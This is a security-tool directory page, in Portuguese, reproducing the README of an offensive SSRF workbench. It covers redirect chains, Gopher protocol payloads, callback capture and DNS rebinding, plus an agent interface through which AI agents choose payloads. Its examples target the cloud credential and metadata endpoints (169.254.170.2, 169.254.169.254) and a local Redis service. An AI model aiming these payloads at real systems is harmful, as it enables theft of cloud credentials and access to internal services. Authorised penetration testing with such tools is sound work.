Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
waybend — SSRF auto-hospedado com redirecionamento, payload, callback e workbench de DNS | Kitploit
Ferramentas/GitHubGitHub/principlebreach/waybend
ReconhecimentoGeração de PayloadsAnálise de VulnerabilidadesScripting e AutomaçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoComando e ControleUtilitários e FrameworksRed Teaming
55há 13 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Análise de DNS
GitHubprinciplebreach/waybend

waybend

SSRF auto-hospedado com redirecionamento, payload, callback e workbench de DNS

Ver RepositórioSite
Compartilhar
Principle Breach

Waybend logo

Waybend

Infraestrutura SSRF auto-hospedada para cadeias de redirecionamento, payloads de protocolo exatos, callbacks, DNS rebinding e evidências de requisição. Um único binário Rust fornece o workbench web, API JSON, respondedor DNS autoritativo e interface MCP via stdio.

Instalação

Instale com Homebrew:

root@kitploit:~
brew install principlebreach/tap/waybend

As versões marcadas também publicam binários assinados para Linux, macOS e Windows na página de releases, além de um contêiner multiplataforma em ghcr.io/principlebreach/waybend.

Compile a partir do código-fonte com Rust 1.88 ou mais recente:

root@kitploit:~
git clone https://github.com/PrincipleBreach/waybend.git
cd waybend
cargo build --release --locked

Início

root@kitploit:~
waybend init waybend.yml
waybend validate --config waybend.yml
waybend serve --config waybend.yml

Abra http://localhost:8080. Cada entrada do catálogo mostra tanto a URL Waybend pronta para copiar quanto seu alvo final exato:

root@kitploit:~
Waybend URL   http://localhost:8080/r/aws-ecs-v2?token=case-17
Final target http://169.254.170.2/v2/credentials/

Use Docker Compose para uma implantação local persistente:

root@kitploit:~
cp waybend.example.yml waybend.yml
docker compose up --build -d

Consulte Primeiros passos para contêineres, binários nativos, validação e o primeiro teste de redirecionamento.

O Que Ele Faz

  • Executa cadeias determinísticas de 1 a 10 saltos com respostas 301, 302, 303, 307 ou 308.
  • Preserva alvos terminais exatos, incluindo esquemas não-HTTP e bytes codificados.
  • Inclui 562 rotas integradas; configurar DNS autoritativo adiciona 16 rotas de rebind.
  • Captura callbacks HTTP, observações de redirecionamento e respostas DNS em SQLite.
  • Carrega pacotes de payload YAML estritos sem recompilar o binário.
  • Fornece aos agentes cinco ferramentas MCP tipadas através de uma skill Waybend portátil.

O catálogo abrange metadados de nuvem, formas de endereço de loopback e rede privada, diferenciais de parser de URL, alvos de arquivo local e rotas Gopher com enquadramento de protocolo. A fronteira de protocolo e as referências primárias estão documentadas em Payloads de protocolo.

Use-o

Pesquise ou exporte o catálogo sem iniciar um servidor:

root@kitploit:~
waybend catalog --config waybend.yml --query metadata
waybend catalog --config waybend.yml --category internal-service --format csv

Construa um redirecionamento dinâmico que preserva bytes:

root@kitploit:~
waybend encode --config waybend.yml --status 307 --hops 2 \
  'Gopher://127.0.0.1:6379/_INFO%0D%0APING'

Correlacione uma rota com ?token=<value>, depois consulte suas observações:

root@kitploit:~
waybend evidence --config waybend.yml list --token case-17 --json

Execute waybend --help ou waybend <command> --help para a superfície de comandos instalada.

Integração com Agentes

Inicie o servidor MCP de entrada/saída padrão:

root@kitploit:~
waybend mcp --config /absolute/path/to/waybend.yml

Ele expõe search_payloads, get_payload, build_redirect, dns_rebind_name e list_evidence. A skill Waybend orienta um agente a selecionar um conjunto focado de payloads, preservar bytes de protocolo, reutilizar um token de correlação e relatar as evidências observadas.

Consulte Integração com agentes para configuração de cliente MCP, os esquemas de ferramentas e instalação da skill.

DNS Rebinding

Delegue uma zona ao Waybend, habilite DNS e publique tanto UDP quanto TCP na porta 53. Os nomes de consulta codificam comportamento estático, alternado ou TOCTOU determinístico:

root@kitploit:~
127-0-0-1.static.rb.example.com
198-51-100-10.127-0-0-1.alt.rb.example.com
198-51-100-10.169-254-169-254.2.toctou.rb.example.com

Prefixe um nome com t-<token>. para unir evidências de DNS e HTTP. Consulte DNS rebinding para delegação, codificação IPv6 e regras de sequência.

Documentação

  • Configuração — cada campo YAML e substituição de ambiente.
  • API HTTP — redirecionamentos, callbacks, evidências, saúde e erros.
  • Pacotes de payload — adicione alvos exatos e cabeçalhos de resposta.
  • Implantação — contêiner, proxy TLS, DNS, armazenamento e logs.
  • Arquitetura — fronteiras de processo e ciclo de vida dos dados.

Contribuindo

Leia CONTRIBUTING.md. Relate vulnerabilidades através de SECURITY.md.

Licença

MIT — consulte LICENSE.


Built by Principle Breach — offensive security research.

Baixar ferramenta